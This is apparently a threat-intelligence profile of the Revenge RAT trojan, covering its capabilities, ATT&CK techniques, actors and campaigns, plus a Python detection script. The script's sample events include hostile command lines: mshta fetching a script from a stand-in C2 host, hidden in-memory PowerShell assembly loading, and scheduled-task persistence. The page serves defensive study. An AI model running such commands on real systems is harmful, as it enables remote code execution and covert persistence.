Revenge RAT
Revenge RAT is a remote access trojan (tracked as S0379) with surveillance, credential access, discovery, persistence, and remote administration capabilities. Reported functionality includes audio capture (microphone interception), screen capture, video capture, keylogging, OS credential dumping, system information discovery, network configuration discovery, and collection of the username from the infected system. It supports remote control through a plugin that provides Remote Desktop Protocol (RDP) access and can transfer additional tools to victim systems.
Execution and persistence behaviors reported for the family include use of the Windows command shell and PowerShell, including the PowerShell Reflection.Assembly technique to load itself into memory; use of mshta.exe to run malicious scripts; and creation of scheduled tasks that run malicious scripts at different intervals. It can also establish persistence through scheduled tasks and a Winlogon Helper DLL.
For command and control, Revenge RAT uses bidirectional web-service communication and encodes the information it sends to its C2 server with Base64. In one campaign, blogpost.com was used as its primary command-and-control server.
The malware is described as publicly available and cross-platform. It has been used by the Bahamut threat actor for remote control, alongside NETWIRE, and campaigns in 2022 delivered a mixture of malware including Loda, Revenge RAT, and AsyncRAT. High-confidence indicators and artifacts explicitly reported include use of blogpost.com as a C2 server, mshta.exe execution, PowerShell Reflection.Assembly in-memory loading, scheduled-task-based execution, and Base64-encoded C2 data.
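The execution and persistence behaviors summarized above (mshta.exe running scripts, PowerShell loading an assembly through Reflection.Assembly, scheduled tasks whose action is a script) all surface in process-creation telemetry. The Python below is an added example, not code from the page or from Mallory: it runs three detection rules over constructed Sysmon-style process events. The event shape, the sample command lines, the rule names and the OFFICE_APPS and SCRIPT_HOSTS lists are assumptions made for the example and should be tuned to the environment.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation events (sample data made up for this
# example; not telemetry from the page). Only the fields the rules need are kept.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"id": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://c2.example.invalid/update.hta",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"id": 2, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -nop -w hidden -c "[Reflection.Assembly]::Load($bytes)"',
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"id": 3, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": 'schtasks.exe /create /sc minute /mo 5 /tn Updater '
                    '/tr "mshta.exe C:\\Users\\Public\\u.hta"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"id": 4, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": 'schtasks.exe /query /tn "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"id": 5, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
]

# Assumed lists (hypothetical; extend for the environment being monitored).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = ("mshta", "powershell", "pwsh", "wscript", "cscript", "cmd")


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(event: Dict[str, object]) -> List[str]:
    """Return the names of the rules an event matches (empty list if none)."""
    image = _basename(str(event["Image"]))
    parent = _basename(str(event["ParentImage"]))
    cmd = str(event["CommandLine"]).lower()
    hits: List[str] = []

    # Rule 1: mshta.exe running a script from a URL, an .hta file or an inline
    # script: protocol handler, or mshta.exe spawned by an Office application.
    if image == "mshta.exe" and (
        re.search(r"https?://|\.hta\b|vbscript:|javascript:", cmd) or parent in OFFICE_APPS
    ):
        hits.append("mshta_script_execution")

    # Rule 2: PowerShell loading a .NET assembly via Reflection.Assembly, the
    # in-memory loading technique named in the summary above.
    if image in ("powershell.exe", "pwsh.exe") and re.search(
        r"reflection\.assembly\]?::load", cmd
    ):
        hits.append("powershell_reflection_assembly_load")

    # Rule 3: schtasks /create whose task action (/tr) is a script host.
    if image == "schtasks.exe" and "/create" in cmd:
        m = re.search(r'/tr\s+"?([^"]+)', cmd)
        action = m.group(1).strip() if m else ""
        if any(action.startswith(h) or ("\\" + h) in action for h in SCRIPT_HOSTS):
            hits.append("schtasks_script_host_persistence")

    return hits


def scan_events(events: List[Dict[str, object]]) -> Dict[int, List[str]]:
    """Map event id -> matched rule names for every event that matched a rule."""
    results: Dict[int, List[str]] = {}
    for ev in events:
        hits = detect(ev)
        if hits:
            results[int(ev["id"])] = hits
    return results


if __name__ == "__main__":
    for event_id, rules in scan_events(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

Events 4 and 5 (a schtasks query and a PowerShell script run from a file) match nothing, which is the point of keying rule 3 on /create and rule 2 on the Reflection.Assembly call rather than on the image name alone; both binaries are common in legitimate administration.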
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
“In 2022, campaigns delivered a mixture of malware such as Loda, Revenge RAT, and AsyncRAT.”
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Bahamut utilized the publicly available, cross-platform remote administration tools (RATs) NETWIRE and Revenge RAT for remote control.
“In 2022, campaigns delivered a mixture of malware such as Loda, Revenge RAT, and AsyncRAT.”
Techniques & procedures
24 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
4 techniques
“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
The content repeatedly describes threat actors and malware using PowerShell scripts/commands for execution, download, staging, reconnaissance, persistence, credential access, lateral movement, and defense evasion; e.g., "Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses."
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
Persistence
3 techniques
“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Privilege Escalation
3 techniques
“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Stealth
3 techniques
"Indirect Command Execution" (listed under Revenge RAT)
"System Binary Proxy Execution: Mshta" (listed under Revenge RAT)
"Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses," "Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk," and "Turla has also used PowerShell scripts to load and execute malware in memory."
Credential Access
2 techniques
"OS Credential Dumping" (listed under Revenge RAT)
Discovery
3 techniques
The content repeatedly describes actors and malware using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, netsh interface show, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, and network adapter/interface details.
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking admin status, and enumerating user sessions.
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
Lateral Movement
1 technique
"Remote Services: Remote Desktop Protocol" (listed under Imminent Monitor, jRAT, njRAT, Revenge RAT, WarzoneRAT)
Collection
4 techniques
"Input Capture: Keylogging" (listed under Agent Tesla, AsyncRAT, Imminent Monitor, jRAT, NETWIRE, njRAT, Revenge RAT, WarzoneRAT)
"Screen Capture" (listed under Agent Tesla, AsyncRAT, jRAT, NETWIRE, njRAT, Revenge RAT)
"Audio Capture" (listed under Imminent Monitor, jRAT, Revenge RAT)
"Video Capture" (listed under Agent Tesla, AsyncRAT, Imminent Monitor, jRAT, njRAT, Revenge RAT, WarzoneRAT)
Command and Control
7 techniques
The adversaries had communicated to both Dropbox and Pastebin. APT28 has used Google Drive for C2. APT37 leverages social networking sites and cloud platforms (AOL, Twitter, Yandex, Mediafire, pCloud, Dropbox, and Box) for C2.
"Web Service: Bidirectional Communication" (listed under Revenge RAT)
"Comnie uses blogs and third-party sites (GitHub, Tumblr, and BlogSpot) to avoid DNS-based blocking"; "Revenge RAT used blogpost.com as its primary command and control server"; "Turla JavaScript backdoor has used Google Apps Script as its C2 server"
"Ingress Tool Transfer" (listed under Agent Tesla, AsyncRAT, Imminent Monitor, jRAT, NETWIRE, njRAT, Revenge RAT, Snip3, WarzoneRAT)
C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding... APT19 HTTP malware variant used Base64 to encode communications to the C2 server... APT33 has used base64 to encode command and control traffic.
"Data Encoding: Standard Encoding" (listed under njRAT, Revenge RAT)
DarkComet can open an active screen of the victim’s machine and take control of the mouse and keyboard.
IOCs tracked for this family
1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Recent activity
35 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Revenge RAT is a remote access trojan used by the RevengeHotels group to gain unauthorized access to hotel and travel industry systems, often delivered via malicious documents exploiting Microsoft Office vulnerabilities.
Revenge RAT is a remote access trojan used by C.A.S to gain remote control over infected systems, execute commands, collect information, and maintain persistence. It is used for file management, credential theft, and defense evasion, including disabling security tools and adding itself to Windows Defender exclusions.
Remote administration tool used by Bahamut to remotely control compromised devices.
Remote access trojan used by TA558, historically delivered via malicious Office documents and later via container formats (ISO/RAR) to establish remote access and support data theft.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.